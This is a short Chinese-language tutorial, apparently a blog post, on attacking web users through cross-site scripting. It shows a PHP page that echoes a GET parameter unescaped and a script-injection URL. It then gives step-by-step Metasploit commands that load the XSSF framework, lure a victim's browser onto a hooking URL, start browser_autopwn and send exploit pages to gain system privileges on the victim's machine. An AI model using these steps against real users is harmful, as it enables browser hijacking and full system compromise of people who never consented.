跨站腳本攻擊(XSS)就是WEB應用對用戶輸入沒有做限制,導致攻擊者向WEB應用程序輸入數據中包含javascript等腳本代碼,WEB程序在其他用戶訪問該頁面時,將攻擊者輸入的腳本代碼返回給用戶,導致該腳本代碼在瀏覽器中執行,導致Cookie竊取等問題。
一、XSS漏洞展現
WEB服務器文件xss.php:
<?php
echo $_GET[‘as’];
?>
構造url: http://ip/xss.php?as=<script>alert(‘hello world’);</script>
這樣用戶在訪問url時,服務器將<script>alert(‘hello world’);</script>返回給用戶,javascript代碼用戶瀏覽器執行。
二、XSSF框架使用
跨站腳本漏洞攻擊框架(XSSF),該框架可以輔助XSS漏洞利用。
1、安裝
將XSSF解壓後放入/opt/framework/msf3下
2、攻擊用戶
load xssf: 加載框架
xssf_urls:查看框架訪問url
將http://ip:8888/loop通過XSS漏洞讓用戶點擊
(用戶點擊之後和受害者IE進程網絡連接保持,可以向受害者IE發送數據,已經在受害者機器上有一定權限)
xssf_victims: 查看受害者信息
xssf_information victimID: 查看受害者詳細信息
3、生成各種瀏覽器漏洞頁面
啓動browser_autopwn模塊:生成各種exploit頁面
use auxiliary/server/browser_autopwn
set LHOST localhostip
set SRVHOST localhostip
set SRVPORT 8080
exploit
jobs : 顯示exploit id
4、向瀏覽器發送漏洞頁面,獲取系統權限
Xssf_exploit victimID exploit_id:向受害者IE發送exploit頁面
拜了個拜!